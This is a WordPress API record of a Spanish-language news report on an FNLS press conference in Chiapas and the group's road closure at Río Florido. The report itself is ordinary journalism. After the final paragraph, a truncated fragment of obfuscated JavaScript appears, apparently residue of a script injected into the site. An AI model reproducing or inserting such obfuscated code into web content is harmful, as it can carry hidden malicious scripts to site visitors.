{"id":1391,"date":"2022-04-19T02:28:02","date_gmt":"2022-04-19T02:28:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1391"},"modified":"2022-04-19T02:28:03","modified_gmt":"2022-04-19T02:28:03","slug":"realiza-bloqueo-carretero-el-fnls-en-rio-florido","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1391","title":{"rendered":"Realiza bloqueo carretero el FNLS en R\u00edo Florido"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-18-at-4.30.30-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-1392\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-18-at-4.30.30-PM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-18-at-4.30.30-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-18-at-4.30.30-PM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-18-at-4.30.30-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- \u201cLa Jornada Nacional de Lucha por Justicia, Libertad, Presentaci\u00f3n y Derecho a la Protesta se dio desde el 13 de abril y hoy estamos dando inicio a varias actividades, el FNLS hace esto constantemente para exigir justicia, la presentaci\u00f3n con vida de los detenidos desaparecidos, libertad para los presos pol\u00edticos y derecho a la protesta\u201d.<\/p>\n\n\n\n<p>Lo anterior lo dijo Carlos \u201cN\u201d vocero del grupo del Frente Nacional de Lucha por el Socialismo (FNLS), quienes con m\u00edtines y conferencias de prensa en distintas partes de la entidad, el Frente Nacional de Lucha por el Socialismo (FNLS) se sum\u00f3 a la jornada de lucha que mantienen en todo el pa\u00eds desde el pasado 13 de abril, donde exigen un alto al hostigamiento contra la organizaci\u00f3n, la aparici\u00f3n de sus con vida de varios de sus compa\u00f1eros y libertad para los presos pol\u00edticos.<\/p>\n\n\n\n<p>Y es que dijo que en la entidad hay unos 200 presos pol\u00edticos que pertenecen a diferentes organizaciones sociales y del FNLS tuvo cuatro presos, que ya salieron libre de toda culpa, \u201cpero a nivel nacional tenemos a un compa\u00f1ero del estado de Veracruz, Virginio Bustos que el tres de mayo cumple un a\u00f1o detenido\u201d.<\/p>\n\n\n\n<p>Asimismo, dijo que el hostigamiento hacia el FNLS contin\u00faa por parte de un grupo paramilitar denominado \u201cLos Petules\u201d, que tambi\u00e9n fueron denunciados por la comunidad El Nacimiento en Ocosingo, que se encuentra agrediendo al FNLS, \u201cnos perdonan que nos pronunciamos por la aparici\u00f3n con vida de Edmundo Reyes Anaya y Alberto Cruz S\u00e1nchez, que fueron desaparecidos desde 2007, a ra\u00edz de eso nos empiezan a perseguir\u201d.<\/p>\n\n\n\n<p>Finalmente, se\u00f1al\u00f3 que durante la Jornada de Lucha van a llevar a cabo la repartici\u00f3n de volantes informativos en distintas carreteras, pero no bloquear\u00e1n, \u201cno hemos bloqueado desde 2019 porque detuvieron y desaparecieron a nuestro compa\u00f1ero Javier, de ah\u00ed no hemos hecho nada, \u00fanicamente repartimos volantes y pedimos cooperaci\u00f3n a los choferes\u201d.<\/p>\n\n\n\n<p>A pesar de lo dicho en la conferencia, un grupo del FNLS realiz\u00f3 por algunos minutos el cierre total del tramo Oxchuc-Ocosingo, a la altura de la comunidad R\u00edo Florido, donde adem\u00e1s cobraron para el tr\u00e1nsito, entre 50, 100 y 200 pesos por veh\u00edculo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- \u201cLa Jornada Nacional de Lucha por Justicia, Libertad, Presentaci\u00f3n y Derecho a la Protesta se dio desde el 13 de abril y hoy estamos dando inicio a varias actividades, el FNLS hace esto constantemente para exigir justicia, la presentaci\u00f3n con vida de los detenidos desaparecidos, libertad para los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1392,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1391","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1391"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1391\/revisions"}],"predecessor-version":[{"id":1393,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1391\/revisions\/1393"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1392"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}